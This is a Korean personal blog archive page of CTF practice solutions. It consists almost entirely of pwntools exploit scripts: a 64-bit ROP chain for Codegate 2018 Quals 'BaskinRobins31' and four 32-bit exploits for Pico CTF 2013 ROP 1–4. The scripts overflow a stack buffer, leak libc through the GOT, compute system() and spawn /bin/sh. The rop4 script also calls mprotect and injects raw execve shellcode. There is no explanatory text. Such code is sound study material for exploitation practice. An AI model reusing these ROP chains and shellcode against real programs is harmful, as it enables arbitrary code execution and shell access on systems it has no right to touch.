'2019/07/24'에 해당되는 글 4건

Codegate 2018 CTF Quals BaskinRobins31

System/Pwnable Practice 2019. 7. 24. 22:53

exploit.py


from pwn import *

p = process("./baskin")

write_plt = 0x4006d0
pppr = 0x40087a
read_plt = 0x400700
read_got = 0x602040
bss = 0x0000000000602090
distance = 0x7f01512ac070 - 0x7f01511eb440
binsh="/bin/sh\x00"

payload = "A"*(0xb0+8)
payload += p64(pppr)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_plt)

payload += p64(pppr)
payload += p64(0)
payload += p64(bss)
payload += p64(len(binsh))
payload += p64(read_plt)

payload += p64(pppr)
payload += p64(0)
payload += p64(read_got)
payload += p64(8)
payload += p64(read_plt)

payload += p64(pppr)
payload += p64(bss)
payload += "A"*16
payload += p64(read_plt)

print p.recvuntil("(1-3)\n")

p.sendline(payload)
print p.recvuntil("Don't break the rules...:( \n")

read = u64(p.recv(8))
system = p64(read-distance)
p.send(binsh)
sleep(0.5)
p.sendline(system)
p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

SECCON CTF 2018 Classic  (0) 2019.07.28
Defcon CTF 2015 r0pbaby  (0) 2019.07.28
Pico CTF 2018 Can you gets me  (0) 2019.07.28
Pico CTF 2018 Buffer Overflow 3  (0) 2019.07.27
Pico CTF 2013 ROP 1~4  (0) 2019.07.24
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Pico CTF 2013 ROP 1~4

System/Pwnable Practice 2019. 7. 24. 21:52

rop1.py


from pwn import *

p = process("./rop1")

shell = 0x080484A4

payload = "A"*(0x88+4)
payload += p32(shell)

p.sendline(payload)

p.interactive()



rop2.py


from pwn import *

p = process("./rop2")

write_plt = 0x80483d0
read_plt = 0x8048380
read_got = 0x804a000
pppr = 0x804859d
binsh = 0x08048610
distance = 0xf7e66cb0 - 0xf7dbd200

payload = "A"*(0x88+4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += "A"*4
payload += p32(binsh)

p.sendline(payload)
system = p32(u32(p.recv(4))-distance)
p.sendline(system)
p.interactive()


rop3.py

from pwn import *

p = process("./rop3")

write_plt = 0x80483a0
pppr = 0x804855d
read_plt = 0x8048360
read_got = 0x804a000
bss = 0x0804a020
distance = 0xf7e3acb0 - 0xf7d91200
binsh = "/bin/sh\x00"

payload = "A"*(0x88+4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh))

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += "A"*4
payload += p32(bss)


p.sendline(payload)
read = u32(p.recv(4))
system = p32(read-distance)
p.send(binsh)
p.sendline(system)
p.interactive()



rop4.py


from pwn import *

p = process("./rop4")

read = 0x8053d20
mprotect = 0x8054990
pppr = 0x80c5e4c
bss = 0x80f0000
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

payload = "A"*(0x88+4)
payload += p32(read)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(shellCode))

payload += p32(mprotect)
payload += p32(pppr)
payload += p32(bss)
payload += p32(len(shellCode))
payload += p32(7)

payload += p32(bss)

p.sendline(payload)
p.sendline(shellCode)
p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

SECCON CTF 2018 Classic  (0) 2019.07.28
Defcon CTF 2015 r0pbaby  (0) 2019.07.28
Pico CTF 2018 Can you gets me  (0) 2019.07.28
Pico CTF 2018 Buffer Overflow 3  (0) 2019.07.27
Codegate 2018 CTF Quals BaskinRobins31  (0) 2019.07.24
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Protostar Heap1

2019. 7. 24. 01:14

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Protostar heap0

2019. 7. 24. 01:14

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

공지사항

글 보관함

달력

«   2019/07   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31

티스토리툴바